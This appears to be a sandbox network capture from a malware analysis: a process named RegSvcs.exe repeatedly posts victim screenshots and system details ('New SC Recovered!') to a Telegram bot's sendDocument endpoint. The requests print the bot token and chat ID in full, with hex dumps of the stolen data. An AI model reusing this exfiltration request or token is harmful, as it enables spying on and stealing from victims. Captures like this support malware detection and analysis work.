2024-12-06 04:52:46 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:52:47 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:52:47 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170401,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460767,"document":{"file_name":"user-610930 2025-01-05 18-11-16.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZoWdSgx_ZP9XMovO0yRZ54pnhVZ6mAALvFAACOh6ZUsiWfhYkasBXAQAHbQADNgQ","file_unique_id":"AQAD7xQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZoWdSgx_ZP9XMovO0yRZ54pnhVZ6mAALvFAACOh6ZUsiWfhYkasBXAQAHbQADNgQ","file_unique_id":"AQAD7xQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaFnUoMf2T_VzKLztMkWeeKZ4VWepgAC7xQAAjoemVLIln4WJGrAVzYE","file_unique_id":"AgAD7xQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 01/05/2025 18:11:13\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49882	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:52:54 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd33c42d569f7a Host: api.telegram.org Content-Length: 66950 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:52:54 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 33 2f 32 30 32 35 20 31 31 3a 31 39 3a 33 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd33c42d569f7aContent-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd33c42d569f7aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/13/2025 11:19:32User
2024-12-06 04:52:54 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:52:54 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:52:54 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:52:54 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:52:54 UTC	1364	OUT	Data Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07 Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
2024-12-06 04:52:54 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 33 63 34 32 64 35 36 39 66 37 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd33c42d569f7a--
2024-12-06 04:52:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:52:55 UTC	1514	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:52:55 GMT Content-Type: application/json Content-Length: 1125 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170402,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460775,"document":{"file_name":"user-610930 2025-01-13 11-19-42.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZomdSgycyXjWJrx2Hm9uyRCk6CqbHAALwFAACOh6ZUpn8g9oYAAGSoQEAB20AAzYE","file_unique_id":"AQAD8BQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZomdSgycyXjWJrx2Hm9uyRCk6CqbHAALwFAACOh6ZUpn8g9oYAAGSoQEAB20AAzYE","file_unique_id":"AQAD8BQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaJnUoMnMl41ia8dh5vbskQpOgqmxwAC8BQAAjoemVKZ_IPaGAABkqE2BA","file_unique_id":"AgAD8BQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 01/13/2025 11:19:32\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49909	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:05 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd3e24c46652e2 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:53:05 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 36 2f 32 30 32 35 20 31 35 3a 31 36 3a 31 39 0a 55 73 65 72 Data Ascii: -----------------------------8dd3e24c46652e2Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd3e24c46652e2Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/26/2025 15:16:19User
2024-12-06 04:53:05 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:05 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:05 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:05 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:05 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:05 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 32 34 63 34 36 36 35 32 65 32 2d 2d 0d 0a Data Ascii: -----------------------------8dd3e24c46652e2--
2024-12-06 04:53:05 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:06 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:06 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170403,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460786,"document":{"file_name":"user-610930 2025-01-26 16-16-19.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZo2dSgzJTCCPS1oHhISX2NRSj1JWuAALxFAACOh6ZUgUEEzDm00lmAQAHbQADNgQ","file_unique_id":"AQAD8RQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZo2dSgzJTCCPS1oHhISX2NRSj1JWuAALxFAACOh6ZUgUEEzDm00lmAQAHbQADNgQ","file_unique_id":"AQAD8RQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaNnUoMyUwgj0taB4SEl9jUUo9SVrgAC8RQAAjoemVIFBBMw5tNJZjYE","file_unique_id":"AgAD8RQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 01/26/2025 15:16:19\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49915	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:06 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4046245e9326 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:53:06 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 30 34 36 32 34 35 65 39 33 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 32 39 2f 32 30 32 35 20 30 39 3a 32 30 3a 30 38 0a 55 73 65 72 Data Ascii: -----------------------------8dd4046245e9326Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4046245e9326Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/29/2025 09:20:08User
2024-12-06 04:53:06 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:06 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 